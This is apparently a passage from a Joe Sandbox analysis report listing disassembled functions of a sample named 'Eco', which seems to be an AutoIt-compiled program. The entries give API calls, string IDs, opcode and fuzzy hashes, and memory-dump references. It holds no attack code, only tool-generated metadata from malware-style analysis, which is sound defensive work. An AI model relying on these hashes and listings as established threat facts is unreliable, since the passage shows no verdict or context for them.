                          • Instruction Fuzzy Hash: BE51BF30A00B06DBDB288FA9C88566E7FB6FF50320F649729F825962D0E770AD508B50
                          Function 005152B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON
                          Download Yara Rule
                          APIs
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005152E6
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051534A
                          • TranslateMessage.USER32(?), ref: 00515356
                          • DispatchMessageW.USER32(?), ref: 00515360
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Message$Peek$DispatchTranslate
                          • String ID:
                          • API String ID: 1795658109-0
                          • Opcode ID: c01b5e450158ae01d320ee0fe60ade10faf7f29d163921d5293a7e4af1536fb8
                          • Instruction ID: 8a7d46d878133b1c15854fbdcf08580624953c8700da8c855c49bf50699d5350
                          • Opcode Fuzzy Hash: c01b5e450158ae01d320ee0fe60ade10faf7f29d163921d5293a7e4af1536fb8
                          • Instruction Fuzzy Hash: 7731A031904706DAFB30CF64DC48BE93FB8BBA1348F14085BE521971D1E6B4A8CAE761
                          Function 0057566C Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                          Download Yara Rule
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00575688
                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00575696
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0057569E
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 005756A8
                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005756E4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: PerformanceQuery$CounterSleep$Frequency
                          • String ID:
                          • API String ID: 2833360925-0
                          • Opcode ID: 1476cbd2d89cc861c16d9b718699ec988a4fa55b9d1de768684f2492bf49a234
                          • Instruction ID: 0a9f28173445070f185b102a2fb413cfcac804762ae0c08f48d1773b0cacf434
                          • Opcode Fuzzy Hash: 1476cbd2d89cc861c16d9b718699ec988a4fa55b9d1de768684f2492bf49a234
                          • Instruction Fuzzy Hash: 41011B31D01A1DDBDF00AFE4EC48AEDBBB8FB19711F404566E505B2140EB709554EBA1
                          Function 00511284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00511275,SwapMouseButtons,00000004,?), ref: 005112A8
                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00511275,SwapMouseButtons,00000004,?), ref: 005112C9
                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00511275,SwapMouseButtons,00000004,?), ref: 005112EB
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: Control Panel\Mouse
                          • API String ID: 3677997916-824357125
                          • Opcode ID: d02c319b10cd95d21399fbadef9518797707d31f40a29140cf69d9788c02997b
                          • Instruction ID: 186c6eb203304e2d6b9c2f3b55bbeca7614b214977e260c9f318afdd741b763c
                          • Opcode Fuzzy Hash: d02c319b10cd95d21399fbadef9518797707d31f40a29140cf69d9788c02997b
                          • Instruction Fuzzy Hash: AF115A75515608BFEB208FA5DC84EEFBBB8FF05740F004999F915D7110E2719E84A7A8
                          Function 00530F16 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0053586C: __FF_MSGBANNER.LIBCMT ref: 00535883
                            • Part of subcall function 0053586C: __NMSG_WRITE.LIBCMT ref: 0053588A
                            • Part of subcall function 0053586C: RtlAllocateHeap.NTDLL(01220000,00000000,00000001,?,00000004,?,?,00530F33,?), ref: 005358AF
                          • std::exception::exception.LIBCMT ref: 00530F4C
                          • __CxxThrowException@8.LIBCMT ref: 00530F61
                            • Part of subcall function 005386FB: RaiseException.KERNEL32(?,?,?,005CAE78,?,?,?,?,?,00530F66,?,005CAE78,?,00000001), ref: 00538750
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                          • String ID: `=Z$h=Z
                          • API String ID: 3902256705-1415512615
                          • Opcode ID: 227e1a15367b8b0a8ee5d3db80165d62edad7da7703efa4e522758840dfcb7a3
                          • Instruction ID: 55b1b4d042c705187756022d25f0d8061def4cb84572fc026632d169000ab4fb
                          • Opcode Fuzzy Hash: 227e1a15367b8b0a8ee5d3db80165d62edad7da7703efa4e522758840dfcb7a3
                          • Instruction Fuzzy Hash: 30F0A43150430EA6CB25BA98DC1A9EEBFECBF51354F100469F91492191EFB18B80C6E5
                          Function 00525B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00525B58
                            • Part of subcall function 005256F8: _memset.LIBCMT ref: 00525787
                            • Part of subcall function 005256F8: _wcscpy.LIBCMT ref: 005257DB
                            • Part of subcall function 005256F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005257EB
                          • KillTimer.USER32(?,00000001,?,?), ref: 00525BAD
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00525BBC
                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00560CFC
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                          • String ID:
                          • API String ID: 1378193009-0
                          • Opcode ID: f61e84625ac09a2d281c5933a955dc54491f66efabb5d47c68ac5756f10dc195
                          • Instruction ID: 3ff54b38dfb8e8b20fa43374049bd368afa2e4f6b785cea97acdb83ef602625f
                          • Opcode Fuzzy Hash: f61e84625ac09a2d281c5933a955dc54491f66efabb5d47c68ac5756f10dc195
                          • Instruction Fuzzy Hash: E521D370904794AFE7728B249889BEBFFECBF12308F00148EE69A571C1D3742989DB41
                          Function 0052278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005249C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,005227AF,?,00000001), ref: 005249F4
                          • _free.LIBCMT ref: 0055FA84
                          • _free.LIBCMT ref: 0055FACB
                            • Part of subcall function 005229BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00522ADF
                          Strings
                          • Bad directive syntax error, xrefs: 0055FAB3
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _free$CurrentDirectoryLibraryLoad
                          • String ID: Bad directive syntax error
                          • API String ID: 2861923089-2118420937
                          • Opcode ID: e5e6950de1efc2d484c0b26aa07926240a5db06b081bbb6773df6fea7ee81987
                          • Instruction ID: af50d3a75532ce166d62e09477a68702d83e7c5dff2d3837e93a2bd97567987f
                          • Opcode Fuzzy Hash: e5e6950de1efc2d484c0b26aa07926240a5db06b081bbb6773df6fea7ee81987
                          • Instruction Fuzzy Hash: 4391737191021AAFCF14EFA4DCA59EEBFB4FF49311F14442AF816AB291DB309949CB50
                          Function 005248B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: AU3! ?Z$EA06
                          • API String ID: 4104443479-1020467815
                          • Opcode ID: 246f78bd22a8a44cd5932b64ce75de85d9bbe4d03125dfb25ef046e9d3eef233
                          • Instruction ID: 8c215a5d9a82c857a58e61f1c0e22ae8cfa352905a6cdba324eb2b150ae6f2ee
                          • Opcode Fuzzy Hash: 246f78bd22a8a44cd5932b64ce75de85d9bbe4d03125dfb25ef046e9d3eef233
                          • Instruction Fuzzy Hash: 6E418B31A041785BDF219B64A8557BF7FA6FF87310F584461E882AB2C6C6209DC4CFA1
                          Function 00579B5E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00524AB2: __fread_nolock.LIBCMT ref: 00524AD0
                          • _wcscmp.LIBCMT ref: 00579C4E
                          • _wcscmp.LIBCMT ref: 00579C61
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _wcscmp$__fread_nolock
                          • String ID: FILE
                          • API String ID: 4029003684-3121273764
                          • Opcode ID: e031d374f454ab928677644d868c1fade17b908741beeb6d1425b37429a924f9
                          • Instruction ID: 987595f035f9e94c7082e17da6b073024925446d1f71fb325c3af59b9af1637f
                          • Opcode Fuzzy Hash: e031d374f454ab928677644d868c1fade17b908741beeb6d1425b37429a924f9
                          • Instruction Fuzzy Hash: E841B871A4021ABADF219AA0EC4AFDF7FFDFF85710F00446AB904AB280D7719D449B65
                          Function 005231BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 005602AB
                          • GetOpenFileNameW.COMDLG32(?), ref: 005602F5
                            • Part of subcall function 005301AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005301CF
                            • Part of subcall function 005308F0: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 0053090F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Name$Path$FileFullLongOpen_memset
                          • String ID: X
                          • API String ID: 3777226403-3081909835
                          • Opcode ID: 49181ac43ea0ca61983807c0be824939fd9fb68f4a76a49908f9210c4dd2308e
                          • Instruction ID: 821fd0fa68196d14b89d22801ab76d624abbaf072e77d51a35e49f3751c7eccb
                          • Opcode Fuzzy Hash: 49181ac43ea0ca61983807c0be824939fd9fb68f4a76a49908f9210c4dd2308e
                          • Instruction Fuzzy Hash: 9421C334A10299ABCF01DFD4D849BEE7FF8BF89300F00405AE405A7281DBB45988CFA1
                          Function 0058CF8E Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9b6594123734a80cfddfe691c6c06ca7993f14a864e584dc50abe905c238285e
                          • Instruction ID: 2c149766c6d0085ed47b9f670f503fb7360ba42f0f10e00afd77524e620cc5b0
                          • Opcode Fuzzy Hash: 9b6594123734a80cfddfe691c6c06ca7993f14a864e584dc50abe905c238285e
                          • Instruction Fuzzy Hash: 2DF129B55083019FCB14EF28C484A6ABBE5FFC8314F14892EF89997291D770E945CF92
                          Function 00521680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: c2957094d1cbb0c752153152c66bc9c89fc14f20d783cf42e7a1e0dfc3a8707e
                          • Instruction ID: 15e1228b6a54b80ba0dac2f2e4eefd589e976d4d3fc6fbc8177a8d0b4c2bb586
                          • Opcode Fuzzy Hash: c2957094d1cbb0c752153152c66bc9c89fc14f20d783cf42e7a1e0dfc3a8707e
                          • Instruction Fuzzy Hash: 6861E071600619EBDF048F25E880AAE7FB4FF94310F198569EC19CF295EB30E960CB55
                          Function 005259D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 005259F9
                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00525A9E
                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00525ABB
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: IconNotifyShell_$_memset
                          • String ID:
                          • API String ID: 1505330794-0
                          • Opcode ID: d32f8386d54283679a345eda5cf067da544f8c3d2d98d610efaa667d51c64795
                          • Instruction ID: 2adc10aabe84173c3e4faa429e2141ef2d194e0f6f780c823ac2bb20bc5dc7fe
                          • Opcode Fuzzy Hash: d32f8386d54283679a345eda5cf067da544f8c3d2d98d610efaa667d51c64795
                          • Instruction Fuzzy Hash: 0B3171B45057118FD720DF24E885697BFF8FF5A305F000A2FE59A87290E771A948DB52
                          Function 0053586C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __FF_MSGBANNER.LIBCMT ref: 00535883
                            • Part of subcall function 0053A2CB: __NMSG_WRITE.LIBCMT ref: 0053A2F2
                            • Part of subcall function 0053A2CB: __NMSG_WRITE.LIBCMT ref: 0053A2FC
                          • __NMSG_WRITE.LIBCMT ref: 0053588A
                            • Part of subcall function 0053A328: GetModuleFileNameW.KERNEL32(00000000,005D43BA,00000104,00000004,00000001,00530F33), ref: 0053A3BA
                            • Part of subcall function 0053A328: ___crtMessageBoxW.LIBCMT ref: 0053A468
                            • Part of subcall function 00533201: ___crtCorExitProcess.LIBCMT ref: 00533207
                            • Part of subcall function 00533201: ExitProcess.KERNEL32 ref: 00533210
                            • Part of subcall function 00538C88: __getptd_noexit.LIBCMT ref: 00538C88
                          • RtlAllocateHeap.NTDLL(01220000,00000000,00000001,?,00000004,?,?,00530F33,?), ref: 005358AF
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                          • String ID:
                          • API String ID: 1372826849-0
                          • Opcode ID: 25a8777800ba0b4e3baf05f6753695a7853c0eb3109a46dc5c9f00f44c6b53b4
                          • Instruction ID: e2e9b1c36f428ae9031618107c086a95040c8cceb8f421380175826b10012030
                          • Opcode Fuzzy Hash: 25a8777800ba0b4e3baf05f6753695a7853c0eb3109a46dc5c9f00f44c6b53b4
                          • Instruction Fuzzy Hash: 6F01F536241B029BD6152738DC06A7EBF98FFD2320F302036F401AB181EE709C0047A0
                          Function 00579135 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00579143
                            • Part of subcall function 00532EB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00539B84,00000000,00538C8D,005358F3), ref: 00532EC9
                            • Part of subcall function 00532EB5: GetLastError.KERNEL32(00000000,?,00539B84,00000000,00538C8D,005358F3), ref: 00532EDB
                          • _free.LIBCMT ref: 00579154
                          • _free.LIBCMT ref: 00579166
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 144f5af94d943480d36d389951f06cd61afa83af8249d10b620ede2dc82f263b
                          • Instruction ID: 1ad959c65db0db451dc8dc280766e82ff483ce54c77b3603ad2f6d1936c7c511
                          • Opcode Fuzzy Hash: 144f5af94d943480d36d389951f06cd61afa83af8249d10b620ede2dc82f263b
                          • Instruction Fuzzy Hash: 09E012B1A05A0342CA246579B949EA31BDC7F88751F54041DB91ED7242CE34E855E174
                          Function 00515E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID:
                          • String ID: CALL
                          • API String ID: 0-4196123274
                          • Opcode ID: 10749fff1e28c8d6247e27edfb466cdfbbbad9152ef83e3e875edc152f0bd282
                          • Instruction ID: 5ec63fa3d058bc3298fcb7b514b1ab030aa701c9dd609679ff3f336fd1ad5729
                          • Opcode Fuzzy Hash: 10749fff1e28c8d6247e27edfb466cdfbbbad9152ef83e3e875edc152f0bd282
                          • Instruction Fuzzy Hash: 41324974508311DFEB24DF14C499AAABFE1BF85304F14895DE88A9B362D731EC85DB82
                          Function 0058DF01 Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                          Download Yara Rule
                          APIs
                          • _strcat.LIBCMT ref: 0058DFD4
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                          • _wcscpy.LIBCMT ref: 0058E063
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __itow__swprintf_strcat_wcscpy
                          • String ID:
                          • API String ID: 1012013722-0
                          • Opcode ID: 942b2df8972e3afd3c8e88f99c42e24ed0b5902ef66489dc27e5f3c1d71ef335
                          • Instruction ID: 7c3fcc0f85adb64d3ee759c32015bcface820206aacc9861fccca29047e28a5a
                          • Opcode Fuzzy Hash: 942b2df8972e3afd3c8e88f99c42e24ed0b5902ef66489dc27e5f3c1d71ef335
                          • Instruction Fuzzy Hash: A4911735A00505DFCB18EF18C99A9A9BBF5FF89310B558459EC0A9F362EB30ED41CB81
                          Function 00576685 Relevance: 3.2, APIs: 2, Instructions: 216COMMON
                          Download Yara Rule
                          APIs
                          • _memmove.LIBCMT ref: 00576759
                          • _memmove.LIBCMT ref: 00576777
                            • Part of subcall function 005768E0: _memmove.LIBCMT ref: 0057696E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
